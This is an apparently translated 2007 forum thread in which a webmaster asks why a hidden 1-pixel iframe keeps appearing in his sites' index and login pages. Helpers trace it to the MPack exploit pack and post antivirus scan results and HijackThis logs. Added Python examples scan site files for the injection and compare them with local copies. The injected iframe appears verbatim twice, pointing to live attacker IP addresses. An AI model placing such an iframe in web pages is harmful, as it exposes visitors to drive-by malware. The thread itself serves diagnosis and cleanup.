Posted: 15 Nov 2007 22:43
|
- Stenley
- Distinguished Citizen
- Joined: 01 Mar 2005
- Posts: 549
- Location: Apatin
|
This code keeps appearing on the sites where I have FTP access:
<iframe src='http://81.95.149.77/t.php' width='1' height='1' style='visibility:hidden'></iframe>
How do I solve this problem?
What exactly does this virus do?
|
|
|
|
Posted: 15 Nov 2007 22:51
|
- bobby
- Administrator
- Joined: 04 Sep 2003
- Posts: 24135
- Location: Wien
|
Dead, no response at all.
It looks like Storm worm to me, but I can't claim anything since I can't open the site to see what it does.
|
|
|
|
|
Posted: 16 Nov 2007 08:18
|
- bobby
- Administrator
- Joined: 04 Sep 2003
- Posts: 24135
- Location: Wien
|
The site or the server was hacked.
Now, which vulnerability they used to do it, I have no idea, because I don't know what you have on the server.
In general, you should update all the software used on that server (Apache, phpBB, whatever is there).
|
|
|
|
Posted: 16 Nov 2007 09:53
|
- NuLLCoDe
- Legendary Citizen
- Đuro Glumac
- Graduate engineer in computer science
- Joined: 08 Feb 2004
- Posts: 3640
- Location: ApAtIn
|
There is a hot new hacking attempt making the rounds lately called JavaScript iframe injection. The hacker injects code into your files which they then use to try to obtain all sorts of information about your shop, server and your visitor's computer. They probably can't get too much information on a properly set up server but there are a lot out there that are not set up properly.
Besides the above, one of the effects this code has is that it causes Google to list your site with a message that says, "This site may harm your computer." Google is using the results of a company named stopbadware.org, which checks websites for this type of code. If they find it, they will then report it to Google, who in turn adds the warning about your site. However, neither of them will notify the shop owner about it so your site could be infected and listed with a serious warning and you wouldn't know it until you noticed the listing on Google.
To check if your site is infected, search your files for
- iframe (not used in most osCommerce shops)
- a line of code that starts with <script language="JavaScript">e
- a string of letters like AAAAAAAA
Any of the above could be in an osCommerce shop legitimately, although it is probably unlikely. If it is, then you need to look closer at the code to see if it belongs there. Keeping a known, good backup of your files on your computer to compare against is always a good idea.
Addendum: 16 Nov 2007 9:53
And a bit more detail about this at http://virtuelvis.com/archives/2007/06/dreamhost-hacked
|
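Added example, not part of the original post: a Python scanner for the three indicators listed above (any iframe, a line starting with <script language="JavaScript">e, a long run of one letter). Ranking 0/1-pixel or invisible iframes as "hidden-iframe", the extension list and the sample page are assumptions made for this illustration.

```python
import re
from pathlib import Path

# The three indicators listed in the post above.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_E_RE = re.compile(
    r"""<script\s+language\s*=\s*["']?javascript["']?\s*>\s*e""", re.I)
LETTER_RUN_RE = re.compile(r"([A-Za-z])\1{7,}")  # e.g. AAAAAAAA

# Assumption (not from the post): an iframe that is 0 or 1 pixel in size or
# styled invisible is ranked above an ordinary, visible iframe.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*['"]?[01]['"]?(?![\d%])"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none""", re.I)

# Assumption: file types worth scanning on a typical PHP/HTML site.
WEB_EXTS = {".html", ".htm", ".php", ".js", ".tpl", ".inc"}

# Constructed sample page; 192.0.2.10 is a documentation-only address.
SAMPLE = (
    "<html><body>\n"
    "<iframe src='/map.html' width='600' height='400'></iframe>\n"
    "<p>Welcome</p>\n"
    "<iframe src='http://192.0.2.10/t.php' width='1' height='1' "
    "style='visibility:hidden'></iframe>\n"
    "</body></html>\n"
)


def scan_text(text):
    """Return sorted (line_no, rule, snippet) tuples for every indicator hit."""
    findings = []
    rules = ((IFRAME_RE, None),
             (SCRIPT_E_RE, "script-starting-with-e"),
             (LETTER_RUN_RE, "repeated-letter-run"))
    for regex, name in rules:
        for m in regex.finditer(text):
            rule = name
            if rule is None:
                rule = "hidden-iframe" if HIDDEN_RE.search(m.group(0)) else "iframe"
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((line_no, rule, m.group(0)[:120]))
    return sorted(findings)


def scan_tree(root):
    """Scan every web file under root; return {relative_path: findings}."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report


if __name__ == "__main__":
    for line_no, rule, snippet in scan_text(SAMPLE):
        print(f"line {line_no}: {rule}: {snippet}")
```

A hit is a reason to open the file and read the line, not a verdict; as the post says, any of the three can occur legitimately.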
|
|
|
Posted: 18 Nov 2007 04:36
|
- Stenley
- Distinguished Citizen
- Joined: 01 Mar 2005
- Posts: 549
- Location: Apatin
|
<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>
Guys, the server is not the problem, the problem is my computer.
How do I remove this "virus" from my computer?
|
|
|
|
Posted: 18 Nov 2007 09:09
|
- bobby
- Administrator
- Joined: 04 Sep 2003
- Posts: 24135
- Location: Wien
|
Stenley, this way we are playing cat and mouse.
Please explain the situation a bit better:
- where does this code appear for you (browser, HTML files on your HDD...)
- if these are sites on the net, give us an address so that we can take a look too
- if these are sites that you build, do you think your computer is infected, so that something keeps inserting those lines into the files you prepare for upload?
So, if it is something on your computer, then post a HijackThis log; the instructions are in the topics marked Important in this forum.
If it is some sites, give us the links so we can check them.
Addendum: 18 Nov 2007 9:09
I examined this last address; it is the MPack exploit pack.
The file that this MPack tries to drop onto the computer has the following detection (almost none):
File file2.exe received on 11.18.2007 08:58:16 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.11.17.0 2007.11.16 -
AntiVir 7.6.0.34 2007.11.16 -
Authentium 4.93.8 2007.11.17 -
Avast 4.7.1074.0 2007.11.18 -
AVG 7.5.0.503 2007.11.17 Obfustat.ZUS
BitDefender 7.2 2007.11.18 -
CAT-QuickHeal 9.00 2007.11.17 (Suspicious) - DNAScan
ClamAV 0.91.2 2007.11.18 -
DrWeb 4.44.0.09170 2007.11.17 -
eSafe 7.0.15.0 2007.11.14 Suspicious File
eTrust-Vet 31.2.5304 2007.11.17 -
Ewido 4.0 2007.11.17 -
FileAdvisor 1 2007.11.18 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.16 -
F-Secure 6.70.13030.0 2007.11.17 -
Ikarus T3.1.1.12 2007.11.18 -
Kaspersky 7.0.0.125 2007.11.18 -
McAfee 5165 2007.11.16 -
Microsoft 1.3007 2007.11.18 PWS:Win32/Bankrypt.gen
NOD32v2 2665 2007.11.17 -
Norman 5.80.02 2007.11.16 -
Panda 9.0.0.4 2007.11.17 Suspicious file
Prevx1 V2 2007.11.18 -
Rising 20.18.60.00 2007.11.18 -
Sophos 4.23.0 2007.11.18 -
Sunbelt 2.2.907.0 2007.11.17 VIPRE.Suspicious
Symantec 10 2007.11.18 Infostealer.Banker.C
TheHacker 6.2.9.133 2007.11.17 -
VBA32 3.12.2.5 2007.11.16 -
VirusBuster 4.3.26:9 2007.11.17 -
Webwasher-Gateway 6.0.1 2007.11.16 Win32.Malware.gen!70 (suspicious)
Additional information
File size: 45568 bytes
MD5: b65929386b4f82f654fe5aa5608fe3a9
SHA1: 85d095efe2c1a0a227373ce8f9e1c31efa8e5f6d
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
|
|
|
|
Posted: 18 Nov 2007 12:27
|
- Stenley
- Distinguished Citizen
- Joined: 01 Mar 2005
- Posts: 549
- Location: Apatin
|
OK, let's hunt it down step by step.
- the code appears in files named index and login (regardless of whether they are html or php)
- The sites are online, but right now I can't show it to you because I removed the code where it appeared; don't worry, though, it will show up again in a few days.
- yes, these are sites that I build and I have FTP access, but the worst part is that some of the sites are plain HTML, meaning there are no upload forms etc. All permissions are set properly (no 777 anywhere) and I have gone through the whole site: there is no suspicious JS, PHP or any other code that would, on the server itself, re-insert the offending code into index.html. So only one option remains: my computer is doing this on its own, without my knowledge or permission, in some background process.
As an FTP client I use FileZilla and all the passwords are saved in it.
HijackThis log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:24:25, on 18.11.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\xampp\apache\bin\apache.exe
C:\xampp\mysql\bin\mysqld-nt.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\svchost.exe
C:\xampp\apache\bin\apache.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\UMonit.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Skype\Plugin Manager\SkypePM.exe
C:\Program Files\The Bat!\thebat.exe
C:\Program Files\ICQLite\ICQLite.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\notepad.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common
Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet
Explorer\SkypeIEPlugin.dll
O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program
Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [UMonit] C:\WINDOWS\system32\UMonit.exe
O4 - HKLM\..\Run: [ICQ Lite] "C:\Program Files\ICQLite\ICQLite.exe" -minimize
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Program Files\ICQLite\ICQLite.exe -trayboot
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: &Download All with FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: &Download with FlashGet - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat
8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program
Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet
Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program
Files\Messenger\msmsgs.exe
O16 - DPF: {5D69485C-EAB1-42AE-93C1-B5A53F238C5A} (FileInterface Class) -
https://online.bancaintesabeograd.com/RetailDLL/FSINT.dll
O16 - DPF: {76326493-E84F-4D4B-939C-1E07B50037F2} (ProxyModule Class) -
https://online.bancaintesabeograd.com/RetailDLL/SGCMSCCD.DLL
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) -
http://messenger.zone.msn.com/binary/ZIntro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) -
http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {E6187999-9FEC-46A1-A20F-F4CA977D5643} (ZoneChess Object) -
http://messenger.zone.msn.com/binary/Chess.cab57176.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{C72106D4-8F9E-480D-B84D-78814D34522E}: NameServer = 212.200.166.8 212.200.166.6
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Apache2.2 - Apache Software Foundation - c:\xampp\apache\bin\apache.exe
O23 - Service: mysql - Unknown owner - C:\xampp\mysql\bin\mysqld-nt.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: XAMPP Service (XAMPP) - Unknown owner - c:\xampp\service.exe
--
End of file - 7811 bytes
|
|
|
|
Posted: 18 Nov 2007 12:36
|
- bobby
- Administrator
- Joined: 04 Sep 2003
- Posts: 24135
- Location: Wien
|
Turn off Word Wrap in Notepad before you copy the log.
We are misunderstanding each other again.
There are two ways the HTML on the site can become infected:
- there is some process on the server that patches your site
- something on your computer modifies the HTML files before upload
It is not possible that something starts uploading files to the server on its own and infects the files that way.
What matters to me is to know whether the HTML files on your own computer are infected as well, so that you are uploading them already infected. I would ask you to check this in Notepad before upload, not in a browser.
If you are 100% sure that the files are OK before you put them on the server, then that means the server is compromised.
Next, do not check the files from the server in a browser; download them again via FTP and check them in Notepad.
It may be that your browser is infected and inserts those lines when you view the site in the browser. Of course, that shows up only locally, on your side. A browser cannot infect files on the server by opening them for viewing/reading.
Addendum: 18 Nov 2007 12:36
Change both the folder name and the name of the program itself here:
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
Nothing may hint at HijackThis.
|
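Added example, not part of the original post: the check described above (local working copy against a fresh FTP download, read as text rather than in a browser) done in Python for a whole site at once. It assumes the server copy has already been downloaded into its own folder; the folder names, file contents and the 192.0.2.10 address are constructed for the demonstration.

```python
import difflib
import hashlib
import tempfile
from pathlib import Path


def _files(root):
    """Map relative POSIX path -> Path for every file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p
            for p in root.rglob("*") if p.is_file()}


def _lines(path):
    return path.read_text(encoding="utf-8", errors="replace").splitlines()


def compare_trees(local_root, server_root):
    """Return {relative_path: (status, lines_present_only_in_server_copy)}."""
    local, server = _files(local_root), _files(server_root)
    report = {}
    for rel in sorted(set(local) | set(server)):
        if rel not in server:
            report[rel] = ("missing-on-server", [])
        elif rel not in local:
            report[rel] = ("only-on-server", [])
        elif (hashlib.sha256(local[rel].read_bytes()).digest()
              == hashlib.sha256(server[rel].read_bytes()).digest()):
            report[rel] = ("identical", [])
        else:
            diff = list(difflib.ndiff(_lines(local[rel]), _lines(server[rel])))
            added = [d[2:] for d in diff if d.startswith("+ ")]
            removed = [d[2:] for d in diff if d.startswith("- ")]
            # Bytes differ but no line does: typically CRLF/LF conversion
            # done by an ASCII-mode FTP transfer, not an injection.
            status = "differs" if (added or removed) else "line-endings-only"
            report[rel] = (status, added)
    return report


def demo():
    """Build two constructed trees (local copy, server download) and compare."""
    page = b"<html>\n<body>hi</body>\n</html>\n"
    injected = (b"<html>\n<body>hi</body>\n"
                b"<iframe src='http://192.0.2.10/t.php' width='1' height='1'>"
                b"</iframe>\n</html>\n")
    with tempfile.TemporaryDirectory() as tmp:
        local, server = Path(tmp, "local"), Path(tmp, "server")
        local.mkdir()
        server.mkdir()
        (local / "index.html").write_bytes(page)
        (server / "index.html").write_bytes(injected)
        (local / "login.php").write_bytes(page)
        (server / "login.php").write_bytes(page)
        (local / "about.html").write_bytes(page)
        (server / "about.html").write_bytes(page.replace(b"\n", b"\r\n"))
        return compare_trees(local, server)


if __name__ == "__main__":
    for rel, (status, added) in demo().items():
        print(rel, status, added)
```

A file reported as "differs" whose extra lines exist only in the server copy was changed after it left the local folder; a file that already carries the lines locally was uploaded that way.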
|
|
|
Posted: 18 Nov 2007 13:04
|
- Stenley
- Distinguished Citizen
- Joined: 01 Mar 2005
- Posts: 549
- Location: Apatin
|
I rule out the first possibility because not all sites on the server are infected; more precisely, only the sites to which I have FTP access are infected, which means I am the source of the infection, and the admin has also inspected the server and everything is OK.
Something on my computer modifies the files and uploads them BY ITSELF without my knowledge.
Not a single file on localhost is infected.
I also thought it might be that, but it isn't; I checked (I use FF).
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 13:02:05, on 18.11.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\xampp\apache\bin\apache.exe
C:\xampp\mysql\bin\mysqld-nt.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\svchost.exe
C:\xampp\apache\bin\apache.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\UMonit.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Skype\Plugin Manager\SkypePM.exe
C:\Program Files\The Bat!\thebat.exe
C:\Program Files\ICQLite\ICQLite.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\notepad.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [UMonit] C:\WINDOWS\system32\UMonit.exe
O4 - HKLM\..\Run: [ICQ Lite] "C:\Program Files\ICQLite\ICQLite.exe" -minimize
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Program Files\ICQLite\ICQLite.exe -trayboot
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: &Download All with FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: &Download with FlashGet - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {5D69485C-EAB1-42AE-93C1-B5A53F238C5A} (FileInterface Class) - https://online.bancaintesabeograd.com/RetailDLL/FSINT.dll
O16 - DPF: {76326493-E84F-4D4B-939C-1E07B50037F2} (ProxyModule Class) - https://online.bancaintesabeograd.com/RetailDLL/SGCMSCCD.DLL
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zone.msn.com/binary/ZIntro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {E6187999-9FEC-46A1-A20F-F4CA977D5643} (ZoneChess Object) - http://messenger.zone.msn.com/binary/Chess.cab57176.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{C72106D4-8F9E-480D-B84D-78814D34522E}: NameServer = 212.200.166.8 212.200.166.6
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Apache2.2 - Apache Software Foundation - c:\xampp\apache\bin\apache.exe
O23 - Service: mysql - Unknown owner - C:\xampp\mysql\bin\mysqld-nt.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
